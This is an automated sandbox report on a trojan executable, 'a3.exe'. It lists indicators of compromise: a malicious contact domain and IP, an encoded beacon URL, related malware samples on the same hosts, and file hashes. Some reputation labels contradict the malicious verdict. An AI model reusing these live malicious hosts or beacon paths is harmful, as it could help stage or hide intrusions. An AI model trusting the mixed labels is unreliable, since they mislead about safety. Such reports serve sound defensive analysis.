api5.feen007.at	87.106.18.141	true	true	0%, Virustotal, Browse	unknown
windowsupdate.s.llnwi.net	178.79.242.0	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api5.feen007.at/favicon.ico	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.wikipedia.com/	msapplication.xml6.7.dr	false	URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.7.dr	false		high
http://www.nytimes.com/	msapplication.xml3.7.dr	false		high
http://www.live.com/	msapplication.xml2.7.dr	false		high
http://api5.feen007.at/webstore/DcjIiNGkOSL0_2FzFS0SI/7PtL4T1ixNrirqXI/ZpdUtfjmbk9XGDI/gk7_2BOWav_2F	{063EC3E5-27C5-11EC-90E9-ECF4BB862DED}.dat.7.dr, ~DF1728008F459C4534.TMP.7.dr	false	Avira URL Cloud: safe	unknown
http://www.reddit.com/	msapplication.xml4.7.dr	false		high
http://www.twitter.com/	msapplication.xml5.7.dr	false		high
http://www.youtube.com/	msapplication.xml7.7.dr	false		high
http://www.google.com/	msapplication.xml1.7.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.106.18.141	api5.feen007.at	Germany		8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498881
Start date:	07.10.2021
Start time:	16:18:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	a3.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/14@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 30.6% (good quality ratio 29.2%) Quality average: 80.6% Quality standard deviation: 27.7%
HCA Information:	Successful, ratio: 70% Number of executed functions: 39 Number of non-executed functions: 36
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.209.183, 104.94.89.6, 20.199.120.151, 20.49.150.241, 95.100.218.151, 95.100.218.79, 20.82.210.154, 2.20.178.24, 2.20.178.33, 152.199.19.161, 20.199.120.85, 20.54.110.249, 40.112.88.60, 52.251.79.25 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.106.18.141	a04.dll	Get hash	malicious	Browse	app10.laptok.at/favicon.ico
	50.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	chat.allager.at/jvassets/xI/t64.dat
	http://far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/w9B514uuWuNRu_2Fovw1B/iJjn_2FjOcMhSdO6/hY1viFbhIYH_2BS/FrMYbmCHgkAwm_2Btu/e29igvEBi/gLOHtqdBI_2B3sibC3Cg/z_2F8IFoCH_2BWJVdUY/ri7hwzyuAx2q5RHXJmbXhc/ygopWPWJKwti5/IOOS1u46/4ZXFc4Ok4SPekiO7ot2QyT_/2FJdMyYfAP/7FTqw0rQZL_2B1pan/wh8ruTp3dham/UlLIzAZ_2Fn/esHGZHp93qljV_/0A_0DvFEgD08oveRu1RDL/3nPBhZLduxccr2_2/FS5iRLSxGBo44/0xUc	Get hash	malicious	Browse	far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/favicon.ico
	4EyIHmLYEBBs.vbs	Get hash	malicious	Browse	chat.allager.at/jvassets/xI/t64.dat

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowsupdate.s.llnwi.net	Inquiry 001742021.doc	Get hash	malicious	Browse	178.79.242.0
	3Rby9Diztd.exe	Get hash	malicious	Browse	178.79.242.0
	a04.dll	Get hash	malicious	Browse	178.79.242.0
	0f.dll	Get hash	malicious	Browse	178.79.242.128
	OR3ogRDyRh.exe	Get hash	malicious	Browse	178.79.242.0
	KVx62u3gsv.exe	Get hash	malicious	Browse	178.79.242.128
	rKQTea8DKe.exe	Get hash	malicious	Browse	178.79.242.0
	NESMA RFQ EQUIPMENTS AND DOCUMENTS REQUIRED.doc	Get hash	malicious	Browse	178.79.242.128
	6dfce00750c09d7a9927dab4bed6b81a4043fab36fba5.exe	Get hash	malicious	Browse	178.79.242.128
	GT09876545678.exe	Get hash	malicious	Browse	178.79.242.0
	REVISED PI 7-10-2021.xlsx	Get hash	malicious	Browse	178.79.242.128
	FACTURA.exe	Get hash	malicious	Browse	178.79.242.128
	uNCouz6hx8.exe	Get hash	malicious	Browse	178.79.242.0
	cBPH5n4T38.exe	Get hash	malicious	Browse	178.79.242.0
	DcF5xuhMNO.exe	Get hash	malicious	Browse	178.79.242.0
	BSQ4wRQciB.dll	Get hash	malicious	Browse	178.79.242.128
	Factura Pendiente.exe	Get hash	malicious	Browse	178.79.242.128
	nEwkr1dC74.exe	Get hash	malicious	Browse	178.79.242.0
	uN85v8VI8X.exe	Get hash	malicious	Browse	178.79.242.128
	OXkB3xMeAr.exe	Get hash	malicious	Browse	178.79.242.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	a04.dll	Get hash	malicious	Browse	87.106.18.141
	50.dll	Get hash	malicious	Browse	87.106.18.141
	Quote -0071021.exe	Get hash	malicious	Browse	217.160.0.7
	DHL SHIPMENT.HTML	Get hash	malicious	Browse	217.160.0.196
	hwIILTIn0n.exe	Get hash	malicious	Browse	217.160.0.17
	just.exe	Get hash	malicious	Browse	212.227.15.158
	2WK7SGkGVZ.exe	Get hash	malicious	Browse	74.208.236.156
	0n1pEFuGKC.exe	Get hash	malicious	Browse	74.208.236.145
	VmbABLKNbD.exe	Get hash	malicious	Browse	74.208.236.108
	Update-KB250-x86.exe	Get hash	malicious	Browse	74.208.5.20
	Update-KB2984-x86.exe	Get hash	malicious	Browse	74.208.5.20
	justifi4c.exe	Get hash	malicious	Browse	213.165.67.118
	CY2075400.exe	Get hash	malicious	Browse	213.165.67.115
	Justificante de la transfer.exe	Get hash	malicious	Browse	212.227.15.142
	IMAGE1001.exe	Get hash	malicious	Browse	213.165.67.115
	Exq3dXFDHe.exe	Get hash	malicious	Browse	217.160.0.243
	MIN8gr0eOj.exe	Get hash	malicious	Browse	74.208.236.228
	solicitud de presupuesto.exe	Get hash	malicious	Browse	217.160.0.21
	Payment Requisition October 4.xlsx	Get hash	malicious	Browse	74.208.236.226
	ZFQ06Cz6TT.exe	Get hash	malicious	Browse	217.160.0.48

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{063EC3E3-27C5-11EC-90E9-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7701344643347803
Encrypted:	false
SSDEEP:	96:r/ZJZR12RW2qWRW2131tRW213yUfRW213ygIFMRW213kGgwbRW2A3kGg4B:r/ZJZX241W4Yt46f4tFM4Kb4ZB
MD5:	FE7E0B15BF69E7D5E77D3E4CBC8FD844
SHA1:	88CF8FE6080E43CAF86E3289743F3F0F6F0264A9
SHA-256:	2260FAEE56EC919ED892395000AEA687299096CB658CD36CFD8709A16EA9EA54
SHA-512:	B0EB02579A0154EE33E4FE04D273D1492F90C495AE6678AE32805E0B2354838B2B5D5AB4BACDC1B15E48489918D74EEC91ACF158F72E16DC57C3848192AAB800
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{063EC3E5-27C5-11EC-90E9-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28124
Entropy (8bit):	1.9146205589171772
Encrypted:	false
SSDEEP:	48:IwMGcpr1Gwpa5G4pQNGrapbSGGQpBuGHHpc7TGUp8HGzYpmmGGop7k8qiPDqz3dH:rQZfQb6tBS+j92VWlMN9TC1dlTlCTA
MD5:	5E3115DE41A4E4B1B521C97AC18813C5
SHA1:	891FA9D6745C7F0C1810B79B0915968E9F4C2930
SHA-256:	5F7C6F8FD48463FF43A349F5101C4A0DA17ADFB15C2B00903B64A78101A559D7
SHA-512:	C88D3CBD0ABDF060A8AC7E0549C6425650D1647E8D803702AB616AED2F36126F2879EB76B57C529D916C065D97611E19B9406D125C0320294FF7C2A3FB50D0D7
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.088938170870811
Encrypted:	false
SSDEEP:	12:TMHdNMNxOE01OnWimI002EtM3MHdNMNxOE01OnWimI00ObVbkEtMb:2d6NxON1OSZHKd6NxON1OSZ76b
MD5:	CFAA0C1E504623245FDEFC9528A298E2
SHA1:	34F63675582E23949D70A2D4D1A4E1CC8C0B790A
SHA-256:	365DBA991887E73B5B2DB0DF9A477F6455760ED25A77A251C3BE2AEEDF692C7E
SHA-512:	BF29CFCA96818EECC3E2AFCB328E3BB4481820AFF1DC8612314F72179290E75E325BF2D9F497147047CD6C3993183936023B4D6728D2D642495E9D31500169E6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.065104180080743
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2krnWimI002EtM3MHdNMNxe2krnWimI00Obkak6EtMb:2d6NxrGSZHKd6NxrGSZ7Aa7b
MD5:	A176224E43E9EDDBFE494818028EE7AB
SHA1:	3BB8B696F63C85AF1C0E94960D84ED6E6D6A0635
SHA-256:	9FA1C7C516CC55D0872EA1334262A8C10BD054A2EEF71B43E1186719383F09B5
SHA-512:	5E33C03EA206206B1ADDEDBCB34B6CD3DBC7F7FE44D6541494825CC69CA5CBAE9B76319754D66E96625540B77CFE52A12776FBB92466EDA12F5584959FA4036F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.10663851901763
Encrypted:	false
SSDEEP:	12:TMHdNMNxvL01OnWimI002EtM3MHdNMNxvL01OnWimI00ObmZEtMb:2d6Nxvg1OSZHKd6Nxvg1OSZ7mb
MD5:	4CF1FB8C2B6628E509091716B3DDD46B
SHA1:	05911E9D90643C2EAD2FF98E816149F44A679638
SHA-256:	5DF8D0CD00CCB850F5E85088F93E3FE2970A554B55A05B0C505BDD97C52F1B39
SHA-512:	911D2B3A5889CA10CB012813E622A754009F7160F417B22B1534B46550B1E32DFF636D21BE76AC9C81E9A096BFA7D34A889AFD89AAB4FCD91F8E67762A4AD5C2
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.055361901508745
Encrypted:	false
SSDEEP:	12:TMHdNMNxiJKInWimI002EtM3MHdNMNxiJKInWimI00Obd5EtMb:2d6NxuKISZHKd6NxuKISZ7Jjb
MD5:	074BD65CAD3A43806997D815CCD310BB
SHA1:	1D281442E0BA47A74363EC75B47D2E88B53CBF4A
SHA-256:	1104831873D15DBE0D741CF5E1E484E7177573C254D4AEE37C05C5A7AEE69AB5
SHA-512:	E53EDDE4294E9924EA58D744EB8039A130FED6C07C9A6688BFD674B46450ACD1029E01897BDAC1FE3933A52221B7B1703C2984BFA2D39BF123742A707C9E3FFD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xdbf118db,0x01d7bbd1</date><accdate>0xdbf118db,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xdbf118db,0x01d7bbd1</date><accdate>0xdbf118db,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1159885561659975
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGw01OnWimI002EtM3MHdNMNxhGw01OnWimI00Ob8K075EtMb:2d6NxQR1OSZHKd6NxQR1OSZ7YKajb
MD5:	82E6B249A578988E85BC7C6ED57C0168
SHA1:	6AECCC4307830A7F3A27FA2951F7FD67F187FC3E
SHA-256:	DAF909323DD36C6BE68B420AF15E76EDD67D773F0299C89D1E6D67F8994531C0
SHA-512:	8D4DA2B26EDD870619340AAF8BF4E28D9EF830D68461873A693FAD618694811955299A19E2409FD7C302BB63BDF8E90686F5E366DF47F29A91567E31970939A7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xdbf84054,0x01d7bbd1</date><accdate>0xdbf84054,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.037015661281331
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nJKInWimI002EtM3MHdNMNx0nJKInWimI00ObxEtMb:2d6Nx0JKISZHKd6Nx0JKISZ7nb
MD5:	3CFC651E6983F1197503C958A59FF72E
SHA1:	4B3F879C0E9841AB266A2A323B2CFB4B3E5C98D7
SHA-256:	E5870E5F72EAEFC0405F0C9047F081A280F5B27A073E19E003B6B86ECB04724D
SHA-512:	C3A360FEC4BEECF1DC433411E44241E42C1ABBB723EA66E331890E94FF983884D02C21B2C740FB357C716B0F3BF035394610484C186CF8A30234716B309AC6BD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xdbf118db,0x01d7bbd1</date><accdate>0xdbf118db,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xdbf118db,0x01d7bbd1</date><accdate>0xdbf118db,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.080777529981643
Encrypted:	false
SSDEEP:	12:TMHdNMNxxJKInWimI002EtM3MHdNMNxxJKInWimI00Ob6Kq5EtMb:2d6NxzKISZHKd6NxzKISZ7ob
MD5:	3870B225A953FACDECF806D3F27F01DA
SHA1:	03D41945033C8FBABEFA7AA1F843B8A5E7C965FD
SHA-256:	AF22888DDE910384C19551EB62DBCE6248C221DC754B5D92A6F6403A97D4640E
SHA-512:	BB547ECB7646A86BE073328A1F0613FA4BBF71A80890E4D6F5315FE83741D3F0E636DE846EE34A643F4F81DD87AEC7E7E7607B36A1ABB05918EB90F9D1F625C9
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xdbf118db,0x01d7bbd1</date><accdate>0xdbf118db,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xdbf118db,0x01d7bbd1</date><accdate>0xdbf118db,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.0563074196705715
Encrypted:	false
SSDEEP:	12:TMHdNMNxcrnWimI002EtM3MHdNMNxcrnWimI00ObVEtMb:2d6NxOSZHKd6NxOSZ7Db
MD5:	5BDD08733FEABBBE890D0028FAAF5E1F
SHA1:	98092E7531A9AC8B40BBD01FE6D28C16965B8310
SHA-256:	68C63C7F3078AB225D4916AB8C767C6D002DC05C3949E4634942BEE8F94D13E6
SHA-512:	31548A010931122325CFBAE97AF82E69E0F02C4E46DA9A44162A8C0EF4500DCDA5571844EC990858000683B9335EB6DECCF8DCE44F5B5294227C6628867D35A7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.044181719856586
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnrnWimI002EtM3MHdNMNxfnrnWimI00Obe5EtMb:2d6NxzSZHKd6NxzSZ7ijb
MD5:	CF8F543F877CB266D950DF963AD9406D
SHA1:	2E90F1248ABF3DB1845E63828242689BDBD51B4E
SHA-256:	88626A4E7C44B0CF6131273949CD910FE4630AADD0DAB67202C378E5C04F3A68
SHA-512:	D375CBDF23EA8D4DFA03C8BA3BAFBFF2099C7F6761D67CAA0575F4D57DABDE743E9B786E8FE9A79CC06D3C011D5A7562518D45E70420778BBA01ECF56665810B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xdbe7901a,0x01d7bbd1</date><accdate>0xdbe7901a,0x01d7bbd1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.422630656681361
Encrypted:	false
SSDEEP:	3:oVXUYzYTM7W8JOGXnEYzYTMZun:o9UYzYTVqEYzYTV
MD5:	F03B712BE3FF150E4E2EE180114CF20A
SHA1:	9988A53E02D5F481CF62E78FB21BF0AC679802F7
SHA-256:	B1E47CABBB3103F18B9086625A9F71696259DA30AFC2E93495A635F4D3144BC4
SHA-512:	92F036490D547FD9A9A7B9002606F43B8E9FE24A9207C58D2DA8F37F436CDC7947E0174DF723C9E49FE79FE237C276BB4C0C5816117EC85866D3E7B37F0B6C5D
Malicious:	false
Preview:	[2021/10/07 16:19:33.153] Latest deploy version: ..[2021/10/07 16:19:33.153] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF1728008F459C4534.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40121
Entropy (8bit):	0.667681657124394
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+XZbSmImRk8ILiPDqz3dYnk8ILiPDqz3dYok8ILiPDqz3dYF:kBqoxKAuvScS+XZbS54i2CMi2Cni2C4
MD5:	C941466D3B30985EA0EADE7426D7C846
SHA1:	0039736FA9FE41B250A33377E7DBDA2FE4DDC78A
SHA-256:	07B1ACFB47135B97D5B07089B000260C617FECD4F0B264FF1534E238D5B54CA2
SHA-512:	5DDA6E800F0DF705AE01D515076007313BBDC54FC5ADB6A7EF4E3FFB46CACDE1C500B7F5084F67801DC95FCD115D2CC273070A75F135063237C6E7884F1822F3
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8F568B21079AA7B9.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40915964020179696
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loRYF9loRg9lWRW2V3ygV3kGx:kBqoIRrRNRW2V3ygV3kGx
MD5:	E2C3A9A25DE0C27EE85FE33712B018AF
SHA1:	AA9D7BFBC164748490A7D2C2BE569342C9AA5533
SHA-256:	F7D913F2D4C405BA40C9B13A585F17EE2C356742D445C79C6FF718EC460472DA
SHA-512:	11161E5C98C4C12E82DE923268277DE352FEFE35F49F6E8D9EA9069E6C83E3AEFCA13220EE59333E2171A16F1ABDD6212D198A9D6B15D278071BD4C79D692DE7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.835334743621618
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	a3.exe
File size:	179712
MD5:	0cc6d274cd84b593210168f51fcd38cd
SHA1:	666fc3963609f4aff528b9a32f7516feebaa6ddf
SHA256:	a3bdb9880bf419f2023e4015545c6c72835dbc5c68cd14fd81d35220bf9449fa
SHA512:	7983ed74b0fc4d75f384433aa9d07354275c9565988cc0d7b3e5c5cfac3bb2fac2bf690dfb8dd2cbc1e25132c72b52bfea05cdf605b61c18c24f10e85fd62fb9
SSDEEP:	3072:fgUV+UgG7cL89xoF+bhyExjSaftm34X/ifmA0XHDI5C4:YG+Y7cL89x/bUExPf437ul8I4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...T...T...T....V..T....G..T....@..T.......T...T..)T....I..T....Q..T....W..T....R..T..Rich.T..........................PE..L..

File Icon


Icon Hash:	a8b0f8d84868687c

Static PE Info

General
Entrypoint:	0x404423
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
